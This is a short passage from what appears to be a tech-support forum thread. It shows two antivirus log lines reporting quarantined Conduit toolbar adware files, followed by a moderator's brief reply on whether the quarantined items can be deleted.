C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP535\A0109403.dll    a variant of Win32/Toolbar.Conduit.P potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP535\A0109404.dll    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
 



#12 boopme

    To Insanity and Beyond

  • Global Moderator
  • 73,331 posts
  • Gender:Male
  • Location:NJ USA

Posted 30 March 2014 - 05:09 PM

Which deleted files?

If the machine is running fine you can delete the ESET findings, otherwise they are OK quarantined as they cannot harm the PC there.



